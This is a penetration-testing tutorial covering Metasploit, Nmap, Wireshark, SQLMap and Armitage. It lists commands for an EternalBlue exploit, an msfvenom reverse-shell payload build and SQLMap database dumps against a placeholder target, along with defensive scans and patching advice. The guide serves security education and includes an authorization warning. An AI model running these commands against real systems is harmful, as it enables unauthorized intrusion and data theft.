Here’s a structured guide to using Metasploit, Nmap, Wireshark, SQLMap, and Armitage for both exploitation and system security . These tools are foundational in ethical hacking and can be used to find vulnerabilities and strengthen defenses :
1. Metasploit Framework
Exploitation Use Cases :
- Find and Exploit Vulnerabilities :
- msfconsole
- search exploit/windows/smb/ms17_010_eternalblue # Example: EternalBlue exploit
- use exploit/windows/smb/ms17_010_eternalblue
- set RHOSTS 192.168.1.100set LHOST your_ip
- exploit
- Payload Delivery :
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f exe > payload.exe
Security Use Cases :
- Vulnerability Scanning :
- msfconsole
- db_nmap -sV -A 192.168.1.0/24 # Import scan results into Metasploit DB
- Penetration Testing : Use Metasploit’s database to track vulnerabilities and prioritize fixes.
2. Nmap (Network Mapper)
Exploitation Use Cases :
- Network Reconnaissance :
- nmap -sV -T4 -p- 192.168.1.100 # Aggressive scan for open ports and services
- nmap –script vuln 192.168.1.100 # Run vulnerability scripts
- Identify Weak Services : Find unpatched services (e.g., outdated Apache, SMB).
Security Use Cases :
- Regular Vulnerability Scans :
- nmap -sV –open -oA scan_results 192.168.1.0/24
- Firewall Configuration : Use Nmap results to close unnecessary open ports.
3. Wireshark
Exploitation Use Cases :
- Traffic Analysis : Capture packets to find credentials, API keys, or unencrypted data.
- tshark -i eth0 -w capture.pcap # Capture traffic to a file
- MITM Attacks : Analyze HTTP traffic for SQLi or XSS payloads.
Security Use Cases :
- Detect Anomalies : Identify suspicious traffic patterns (e.g., unusual outbound connections).
- Post-Incident Analysis : Reconstruct attack paths after a breach.
4. SQLMap
Exploitation Use Cases :
- SQL Injection Attacks :
- sqlmap -u “http://target.com/login.php?user=admin” –dbs # Enumerate databases
- sqlmap -u “http://target.com/login.php?user=admin” –dump # Dump database tables
- Privilege Escalation : Exploit SQLi to gain administrative access to a database.
Security Use Cases :
- Web Application Testing : Scan for SQLi vulnerabilities in your own apps.
- sqlmap -u “http://yourapp.com/api” –batch –level 5
- Input Validation Enforcement : Use findings to patch SQLi vulnerabilities (e.g., parameterized queries).
5. Armitage (Metasploit GUI)
Exploitation Use Cases :
- Visualize Exploits : Use Armitage’s GUI to manage exploits, payloads, and Meterpreter sessions.
- Steps :
- Launch Armitage:
armitage. - Add a target IP.
- Use the “Exploits” tab to search for vulnerabilities.
- Launch Armitage:
- Steps :
- Post-Exploitation : Deploy payloads and escalate privileges via the GUI.
Security Use Cases :
- Network Visualization : Map network and identify high-risk systems (e.g., unpatched servers).
- Threat Hunting : Track Meterpreter sessions to detect unauthorized access attempts.
6. Best Practices for Security
Based on Tool Findings :
- Patch Management :
- Use Nmap/Metasploit results to prioritize patching CVEs (e.g., MS17-010).
- Network Segmentation :
- Isolate vulnerable systems using firewall rules identified by Nmap scans.
- Web App Hardening :
- Fix SQLi/XSS vulnerabilities found by SQLMap.
- Monitor Traffic :
- Use Wireshark to detect data exfiltration or unauthorized protocols.
Quick Reference Table
| Tool | Exploitation Command | Security Command |
|---|---|---|
| Metasploit | msfconsole; use exploit/windows/smb/ms17_010_eternalblue | db_nmap -sV -A 192.168.1.0/24 |
| Nmap | nmap -sV --script vuln 192.168.1.100 | nmap -sV --open -oA scan_results 192.168.1.0/24 |
| Wireshark | tshark -i eth0 -w capture.pcap | Analyze traffic for anomalies |
| SQLMap | sqlmap -u "http://target.com/login.php" --dump | sqlmap -u "http://yourapp.com/api" --batch |
| Armitage | Launch GUI to manage exploits and payloads | Visualize network拓扑 and track Meterpreter sessions |
Ethical & Legal Considerations
- Authorization : Only test systems you own or with explicit permission.
- Scope : Define clear boundaries to avoid unintended damage.
- Disclosure : Report findings to the affected organization if authorized.
Example Workflow
- Reconnaissance :
- Use Nmap to scan a network for open ports and services.
- Exploitation :
- Use Metasploit to exploit an unpatched SMB service.
- Use SQLMap to extract database credentials.
- Post-Exploitation :
- Use Meterpreter to escalate privileges via Armitage.
- Security Response :
- Patch the SMB vulnerability and SQLi flaw.
- Close unnecessary ports using firewall rules.
Practice Resources
- Tools :
- Kali Linux : Pre-installed tools for all scenarios.
- Metasploitable VM : A vulnerable VM for testing.
- Platforms :
- Hack The Box (Real-world exploitation).
- TryHackMe (Rooms like “Metasploit” and “SQLi”).
By mastering these tools and applying them ethically, you can both exploit vulnerabilities and strengthen system defenses . Always prioritize legal compliance and responsible disclosure ! 🔍🛡️
